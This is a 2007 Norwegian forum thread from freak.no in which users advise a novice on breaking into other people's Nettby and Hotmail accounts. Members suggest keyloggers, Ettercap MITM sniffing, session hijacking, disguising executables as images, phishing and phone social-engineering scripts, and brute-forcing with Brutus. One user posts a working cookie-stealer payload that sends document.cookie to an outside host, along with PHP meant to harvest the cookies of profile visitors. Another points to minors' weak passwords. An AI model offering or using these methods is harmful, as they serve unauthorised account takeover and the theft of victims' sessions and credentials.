Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  50 17874
Jeg er noob i hacking osv, en er samtidig ikke helt borte på alt som heter data og internett. Jeg lurte på om det var noen "enkle" metoder for og finne passord til nettby accounter eller hotmail accounter?

Takker på forhånd
Beklager å skuffe deg, men utenom keylogging er det ingen måte å automagisk få tryllet til seg passordene.
Nei. Det finnest ikke noen lett måte å gjøre det på.
Ja, selvfølgelig er det enkle metoder for å finne passord sånn at hvermannsomhelst kan gå inn på andres mail.
ja, men er keylogging så meget vanskeligt da? Har mulighet til og få vedkommene til og laste ned en fil.
Sitat av Jeenyus
ja, men er keylogging så meget vanskeligt da? Har mulighet til og få vedkommene til og laste ned en fil.
Vis hele sitatet...
HAr du mulighet for og få vedkommene til og laste ned og kjøre en fil og han ikke har antivirus så kjør på!
ja, er keylogging så vanskeligt da?
Søk.

Men ja, men vist du finner en idiot som laster ned "Keylogg.exe" og instalerer som programmet fortere en fortest og trykker "kjør" så er det passe enkelt ja!
Altså, jeg kommer til å stenge denne tråden fordi dette har vært tatt opp så jævlig mange ganger fra før.

Men, det er generelt flere ting du kan gjøre for å få tilgang til en konto. Alt etter forutsetningene, selvfølgelig. Det første som slår meg, som også er nevnt i tråden er keylogging. Keylogging er kort og greit et applikasjon som recorder tastetrykk som blir utført av bruker, og som ofte har muligheten til å rapportere disse inn til den som ønsker å motta dette. En keylogger er veldig enkel å skrive selv, og det finnes mange av disse fra før. Søker du litt rundt så finner du nok mange forskjellige.

Det andre forutsetter at du er på samme nettverket som den du ønsker å snappe opp passordet fra. Verktøyet du ønsker å bruke da heter Ettercap. Med dette kan du utføre et såkalt MITM (Man in the middle) angrep som essensiellt gjør at du mottar all data som forekommer mellom offret ditt og gateway. Hvilket betyr at du ser HTTP trafikk, og du kan dermed se HTTP POST eller GET som sendes inn. Dette er ofte i klartekst og kan leses direkte ut. Ettercap skal per default snappe opp elemeter som heter "password" og lignende.

Du kan altså sniffe trafikken direkte og snappe opp POST for å finne ut brukernavn og passord. Dette krever at du sniffer i det øyeblikket ofret ditt logger seg på. Men, du må nødvendigvis ikke gjøre dette. Det er her "session hijacking" kommer inn i bildet.

Dersom du leser HTTP Protokollens RFC så finner du ut hva session er. I og med at http stort sett er en stateless protokoll så krever dette at klienten refererer til forrige gang han var tilkoblet serveren. Her kommer altså session id inn i bildet. Første gang du kobler deg til en server som vil bruke session så responderer han med en header som sier noe som "Set cookie: blablabla"... Browseren lagrer dette, og sender inn "Cookie: PHPSESSID=blablabla" i sin neste forespørsel. Serveren sjekker da opp verdien som den har lagret i sin session fil mot det som klienten sender inn, og dermed vet han at det er samme klienten som er tilkoblet på nytt.

Så, dersom du snapper opp en session id fra en forespørsel til webserver, kan du dermed utføre en session-hijack. Du kan garantert google mer om disse emnene, men jeg føler jeg har forklart nok akkurat nå.

Edit: Bleh, har på meg snillstøvlene nå så jeg orker ikke stenge tråden likevell.
Sist endret av m0b; 4. august 2007 kl. 02:48.
takk<3 *tegn*
www.slaskpost.se

Bare å søke på email accounter der, krever ingen innlogging >_>
drmight: Er jeg for full til å observere at slaskpost på noen som helst jævla måte kan hjelpe i å snappe opp brukernavn og passord fra en bruker mot et host, eller er det du som mangler hinsides all insikt i tråden og emnet?+
litt offtopic men jeg datt faktisk ned ifra sofaen i krampelatter da jeg leste innlegget ditt d13m0b
Send fake epost gjennom hotmail elns.. si at du er admin på nettby og trenger passord og brukernavn for å fikse noe på personens konto.
Du trenger scriptet (som du får ved å søke), kunne lyve passe godt og ikke minst være villig til å bryte lover
Sitat av drmight
www.slaskpost.se

Bare å søke på email accounter der, krever ingen innlogging >_>
Vis hele sitatet...

Faen, skrev denne inn feil plass, flere tabs kan være stress iblandt >_<
Sitat av torsken
HAr du mulighet for og få vedkommene til og laste ned og kjøre en fil og han ikke har antivirus så kjør på!
Vis hele sitatet...
Er ikke akkurat vanskelig å gjøre sånn at anti-virus ikke snapper opp filen som skadelig
Men kan også gjøre sånn at det ser ut som en .jpg fil, men da må exe filen være i samme mappe og skjult.
Sist endret av Bundy; 5. august 2007 kl. 19:12.
Sitat av Blackspot
Send fake epost gjennom hotmail elns.. si at du er admin på nettby og trenger passord og brukernavn for å fikse noe på personens konto. ......
Vis hele sitatet...
og den tror du folk flest går på?
Har funnet tak i et cookie-stealer script, som ser ut til å fungere.
Må settes opp på nettside med Sql database, Readme følger med...

Ang. Nettby, er med en fil; image.php, som en kan legge inn på Nettby som bilde, og da vil de som åpner profilen din kjøre scriptet bak, samt få opp bildet som en legger ved, og Tata, du har cookien deres på nettby (etter hva det jeg har forstått ut av det)

Anbefaler å slenge opp scritet på en gratis nettsidehost med fake navn, kjører selg, samt tester det på min private side, men kommer kansje til å skaffe meg et freedomain senere, når alt er oppe å sviver...


Scriptet kan hentes på; DrMight.com
http://crackedproductions.com/episode-four/

Film som viser hvordan man kan gjøre slik at det ser ut som om eposten kom fra en annen.
Ja, og hvordan i svarte faen har d tenkt at du skal kunne lese svaret fra stakkaren? Bruk rett ende av ryggen til tenking ...
Sist endret av m0b; 5. august 2007 kl. 22:47.
Tror kaketyven min fungerer sånn noenlundes nå....

Noen som har lyst å skrive

Kode

javascript:document.location='http://www.drmight.com/dl/cookie/cookiestealer.php?s='+document.cookie;
i adresselinja her?
Sitat av drmight
Tror kaketyven min fungerer sånn noenlundes nå....

Noen som har lyst å skrive

Kode

javascript:document.location='http://www.drmight.com/dl/cookie/cookiestealer.php?s='+document.cookie;
i adresselinja her?
Vis hele sitatet...
Endra den dritten, stikk inn her heller;

Kode

javascript:document.location='http://www.drmight.com/dl/kake/kake.php?s='+document.cookie;
Enkel POST / GET script, ikke værre...
Funker fint på Nettby verfall..
Fett! Dette må noen med mer peiling en meg prøve.
Jeg har et domene jeg godt kan bruke, men vet ikke hva jeg skal gjøre

Pokker! Ikke bruk passordet mitt til noe kødd a?
Sist endret av torsken; 6. august 2007 kl. 19:37.
Sitat av Spiralgalakse
http://crackedproductions.com/episode-four/

Film som viser hvordan man kan gjøre slik at det ser ut som om eposten kom fra en annen.
Vis hele sitatet...
Ser den linken her var fryktelig populær.
http://crackedproductions.com/visitor-map/ er det masse masse norske referert fra tråden her ^^
Sitat av torsken
Fett! Dette må noen med mer peiling en meg prøve.
Jeg har et domene jeg godt kan bruke, men vet ikke hva jeg skal gjøre

Pokker! Ikke bruk passordet mitt til noe kødd a?
Vis hele sitatet...
Ska være snill =p



Holder nå på å prøve å slenge koden inn i en php/png slik at alt en trenger er å vise et bilde på profilsiden på Nettby for at folka gir deg kaka si...

Bildet;

Kode

<?php
header("Content-Type: image/png");
$image = 'image.png';
$im = imagecreatefrompng($image);
imagepng($im);
ImageDestroy($im);
?>
Tenker på å evt bruke 2 filer slik at den ene poster samt redirecter til den andre som leser av dette, men er litt rusten på php atm, og bøkene mine er til utlåns....

Er heller ikke sikker på om det kommer til å fungere helt ved å redirecte fra det ene bildet til det andre, skal være mulig å lese kaken direkte av, men er som sagt ikke helt stabil på php atm...


Noen som har peiling på dette?

1. Hvordan lese inn document.cookie direkte inn i phpscript?
2. Er det mulig med en slik redirect, evt hvordan..?

Hadde tenkt noe som dette ved redirect;

Kode

<?php
header("Content-Type: image/png");
$image = 'image.png';
$im = imagecreatefrompng($image);
imagepng($im);
ImageDestroy($im);
?>
<html>
	<script type="text/javascript">
<!--
document.location = 'http://www.drmight.com/dl/kake/image.php?s='+document.cookie;
//-->
</script>
</html>
der ./image.php bruker $_GET['s']; for å hente kaka (./image.php fungerer)



Ja, Google er en fin ting, men av og til litt av en jungel...

Kommer til å legge scriptet ut for nedlasting når det er ferdig, så bare å hjelpe til her folks..!
Sist endret av Lanjelin; 7. august 2007 kl. 00:16.
Vær forsiktig hvilken host du bruker til slike formål, og hvor mye personinformasjon de har om deg. Snakker av erfaring.
Sitat av Dyret
Vær forsiktig hvilken host du bruker til slike formål, og hvor mye personinformasjon de har om deg. Snakker av erfaring.
Vis hele sitatet...

Kommer til å flytte det til en free host når det er ferdig og fungerer 100%
til de som driver med javascript osv til cookies stealing:
Det funker ikke, jeg har prøvd selv.
kake stjeleren funket perfekt, men så fant jeg ut at nettby ganske enkelt filtrerer bort alt.
Enkelt og greit..

Jeg lagde en tråd der jeg spurte om det gikk ann å se cookies med flash (her) men det var heller dårlig med svar jeg fikk .
Sist endret av lsrr; 7. august 2007 kl. 01:52.
19.........bokstaver
bavarai's Avatar
zitcon:

Flash er vel klientbasert?, da er det vel heller vanskelig. Med mindre du skal kontakte et serverside script.
Ser ut som utnytting av cookieinnhold på nettby kun fungerer hvis det er samme eksterne IP..
Sist endret av Lanjelin; 11. august 2007 kl. 05:30.
Når jeg har lastet ned ettercap hvordan skal jeg så innstalere det?? jeg får bare opp alle filene i WinZip og ingen av de heter "setup"
Sitat av comi
zitcon:

Flash er vel klientbasert?, da er det vel heller vanskelig. Med mindre du skal kontakte et serverside script.
Vis hele sitatet...
javascript foregår vel også på klienten ? - og der funker det fett .
Burde vel ikke være noe større problemer med flash/actionscript.
▼ ... noen måneder senere ... ▼
Beklager å ta opp en gammel tråd, men jeg er ute etter å knekke ett passord på nettby. Jeg vet begynnelsen av passordet men mangler 2 eller flere bokstaver/tall. Det som er planen er å bruteforce passordet. Men jeg trenger da å få laget en passordliste med dem kriteriene jeg vil ha f.eks civicxxx (xxx er bokstavene jeg mangler) Jeg kan også nevne at jeg vet sånn ca hvor på tastaturet disse bokstavene befinner seg. Noen som vet om en passord generator som klarer denne jobben og hvilken bruteforce program som passe best til nettby:P

Ble litt dårlig skrevet det her, men håper dere forstår
wwwhack eller brutus.
Sitat av Dyret
Vær forsiktig hvilken host du bruker til slike formål, og hvor mye personinformasjon de har om deg. Snakker av erfaring.
Vis hele sitatet...
utdyp værsasnill
Sitat av brunost
utdyp værsasnill
Vis hele sitatet...
Hosts som f.eks. start.no krever mobilregistrering for at du skal kunne få hosting, og finner de plutselig ut at du sitter og stjeler eventuell sensitiv informasjon (phishing) er det kort vei til en anmeldelse. Samme går for domener registrert i ditt navn. Politiet har svært dårlig kunnskap innen data-'krinimalitet' og beslaglegger utstyret ditt over en lav sko. De skiller ikke mellom uskyldige hacks og alvorlige crackerangrep, og å forklare seg er ikke vits å prøve på en gang.
Social engineering er nesten alltid den enkleste metoden for å lokke til deg passord. AV Voice Changer + Voip Buster til hjemmetelefon = fett.

Hei, dette er Fredrik Kristiansen fra nettby som ringer, vi har litt problemer med SQLDatabasen, og trenger passordet ditt for å gjenoprette deler som er blitt mistet.
Enkleste til nettby for tiden er vel bare å sette opp en nettbyll mirror for så å modifisere den litt? :P
visst du har tenkt å hacke ein hotmail konto eller nettby så er det letteste å sitte på samme nettverk som personen. sniff opp pakkene han sender ut når han logger inn på sidene. eg trur hotmail passordene er krypterte så da må du cracke dei.

ein annen metode er cookie stealer. du "låner" cookien som siden gir ut. i denne cookien står det også passord, men du må leite litt og rote rundt hehe.

og sisst har vi keylogger og trojaner. vil påstå at det kun er dyktige og proffe folk som bruker det. utrulig vansklig å få til. og dei programmerer som regel trojanene og keyloggerene selv.

og selvsagt kan du bruke litt sunn fornuft. visst du sniffer opp passordet til personen på nettby, er det stor sjangse for at personen bruker samme passord på hotmail.

GL og HF
▼ ... over en uke senere ... ▼
Har aldrig vart inne på nettby.no, det skulle kunne vert muligt hvis det fanns en exploit som virket på siden, for exemple hvis du bruker deg av SQL Injection. Så att du muligt skulle få opp brugernavn och passwordene kryptert i MD5. Men den muligheten er liten tror eg. Du skulle kunne bruke deg av en bruteforce metode. Programmene du skulle brukt det av er Brutus eller Http bugger og en feit list SSL proxies.
▼ ... noen måneder senere ... ▼
Sitat av |d13m0b
Altså, jeg kommer til å stenge denne tråden fordi dette har vært tatt opp så jævlig mange ganger fra før.

Men, det er generelt flere ting du kan gjøre for å få tilgang til en konto. Alt etter forutsetningene, selvfølgelig. Det første som slår meg, som også er nevnt i tråden er keylogging. Keylogging er kort og greit et applikasjon som recorder tastetrykk som blir utført av bruker, og som ofte har muligheten til å rapportere disse inn til den som ønsker å motta dette. En keylogger er veldig enkel å skrive selv, og det finnes mange av disse fra før. Søker du litt rundt så finner du nok mange forskjellige.

Det andre forutsetter at du er på samme nettverket som den du ønsker å snappe opp passordet fra. Verktøyet du ønsker å bruke da heter Ettercap. Med dette kan du utføre et såkalt MITM (Man in the middle) angrep som essensiellt gjør at du mottar all data som forekommer mellom offret ditt og gateway. Hvilket betyr at du ser HTTP trafikk, og du kan dermed se HTTP POST eller GET som sendes inn. Dette er ofte i klartekst og kan leses direkte ut. Ettercap skal per default snappe opp elemeter som heter "password" og lignende.

Du kan altså sniffe trafikken direkte og snappe opp POST for å finne ut brukernavn og passord. Dette krever at du sniffer i det øyeblikket ofret ditt logger seg på. Men, du må nødvendigvis ikke gjøre dette. Det er her "session hijacking" kommer inn i bildet.

Dersom du leser HTTP Protokollens RFC så finner du ut hva session er. I og med at http stort sett er en stateless protokoll så krever dette at klienten refererer til forrige gang han var tilkoblet serveren. Her kommer altså session id inn i bildet. Første gang du kobler deg til en server som vil bruke session så responderer han med en header som sier noe som "Set cookie: blablabla"... Browseren lagrer dette, og sender inn "Cookie: PHPSESSID=blablabla" i sin neste forespørsel. Serveren sjekker da opp verdien som den har lagret i sin session fil mot det som klienten sender inn, og dermed vet han at det er samme klienten som er tilkoblet på nytt.

Så, dersom du snapper opp en session id fra en forespørsel til webserver, kan du dermed utføre en session-hijack. Du kan garantert google mer om disse emnene, men jeg føler jeg har forklart nok akkurat nå.

Edit: Bleh, har på meg snillstøvlene nå så jeg orker ikke stenge tråden likevell.
Vis hele sitatet...
session hijack funker desverre ikke, ettersom ip må stemme overens med session id, ja jeg testa
Det letteste hadde nok vært å stjele cookien til personen ved hjelp av XSS. Jeg har aldri brukt nettby, men de har garantert en eller annen feil som du kan utnytte.
Sitat av Glyserol
Det letteste hadde nok vært å stjele cookien til personen ved hjelp av XSS. Jeg har aldri brukt nettby, men de har garantert en eller annen feil som du kan utnytte.
Vis hele sitatet...
Etter å ha trikset litt med dette under utviklingen av Nettbyll kan jeg kort oppsummere sikkerhetssystemet til Nettby og hvorfor ideen din ikke vil fungere:

1. Du logger på, brukernavn og passord sjekkes.
2. Auth godtas, en cookie med siste innlogging (timestamp), siste brukernavn, brukerid'en din, og en "session key". lages.
3. Ip ved innlogging registreres og knyttes opp mot denne "session key'en".

Grunnen til anførselstegnene er fordi denne key'en kan være konstant over lange perioder, selv etter passordbytte, ip-bytte og sletting av alle cookies (som for øvrig er satt til expire ved browserslutt uansett). Denne er også bare en 'session key' og kan derfor ikke brukes til noe annet enn å stjele en annens session hvis du har samme ip som vedkommende.
prøv nicket til jenter på opp til 16 år, så bruker du passordet 1234.. uhyre ofte brukt, husk og vær tålmodig
Sitat av Dyret
Etter å ha trikset litt med dette under utviklingen av Nettbyll kan jeg kort oppsummere sikkerhetssystemet til Nettby og hvorfor ideen din ikke vil fungere:

1. Du logger på, brukernavn og passord sjekkes.
2. Auth godtas, en cookie med siste innlogging (timestamp), siste brukernavn, brukerid'en din, og en "session key". lages.
3. Ip ved innlogging registreres og knyttes opp mot denne "session key'en".

Grunnen til anførselstegnene er fordi denne key'en kan være konstant over lange perioder, selv etter passordbytte, ip-bytte og sletting av alle cookies (som for øvrig er satt til expire ved browserslutt uansett). Denne er også bare en 'session key' og kan derfor ikke brukes til noe annet enn å stjele en annens session hvis du har samme ip som vedkommende.
Vis hele sitatet...
Da blir det litt vanskeligere.

Det kommer vel an på hva du er på jakt etter. Vil du ta over kontoen vil da ikke XSS og stjele cookie funke, men er du på jakt etter å gjøre noe bestemt med kontoen hans(unntatt å bytte passord for jeg antar at det krever forkunnskaper om daværende passord) vil en XSS feil fortsatt kunne gjøre jobben.
▼ ... over en måned senere ... ▼
Sitat av Jeenyus
Jeg er noob i hacking osv, en er samtidig ikke helt borte på alt som heter data og internett. Jeg lurte på om det var noen "enkle" metoder for og finne passord til nettby accounter eller hotmail accounter?

Takker på forhånd
Vis hele sitatet...

Tro meg,du vill ikke hacke nettby, jeg fikk bare trøbbel av å gjøre det
Såpass? Fortell, PJ92.
Er det virkelig lov å diskutere dette på forumet? Det er jo tross alt noe ulovlig?
Sitat av Appelsinjuice
Er det virkelig lov å diskutere dette på forumet? Det er jo tross alt noe ulovlig?
Vis hele sitatet...
Hacking er fullt lovlig å diskutere her ja. Å dra opp en gammel, dau tråd bare for å skryte litt og slå den litt til for å forsikre seg om at den er dau, derimot, det stiller jeg meg heller skeptisk til...
Sitat av Appelsinjuice
Er det virkelig lov å diskutere dette på forumet? Det er jo tross alt noe ulovlig?
Vis hele sitatet...
Jeg ser ikke grunnen til å ikke kunne diskutere uskyldig datalek på forumet.
Det er tross alt en del ting som er mer ulovlig enn dette som blir diskutert her.